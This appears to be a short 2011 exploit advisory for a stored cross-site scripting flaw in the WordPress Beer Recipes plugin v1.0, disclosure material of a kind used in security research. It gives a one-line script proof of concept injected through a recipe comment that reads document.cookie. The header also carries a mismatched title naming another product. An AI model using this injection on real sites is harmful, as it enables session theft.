Exploit for wordpress: WordPress Beer Recipes Plugin v.1.0 XSS
# Exploit Title: WordPress - Beer Recipes v.1.0 XSS
# Google Dork: - |
# Date: June / 25 / 2011 |
# Author: TheUzuki.' |
# Software Link: http://opensourcebrew.org/beer-recipes-plugin/ |
# Version: v.1.0 |
# Tested on: Windows 7 |
# CVE : - |
#################################################################### |
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities |
# download: http://opensourcebrew.org/beer-recipes-plugin/ |
# |
# Author: TheUzuki.' from HF |
# mail: uzuki[@]live[dot]de |
# |
# |
# This was written for educational purpose. Use it at your own risk. |
# Author will be not responsible for any damage. |
# |
#################################################################### |
# |
# Notes: You need to be User at the WordPress Board |
# |
#################################################################### |
--Description of WordPress Plugin-- |
Creates a custom post type for easily entering beer recipes into WordPress |
--Exploit-- |
By Commenting a Beer Recip, with a javascript, the Javascripts,gets executed directly. |
This causes a XSS. |
--PoC-- |
<script>alert(document.cookie)</script>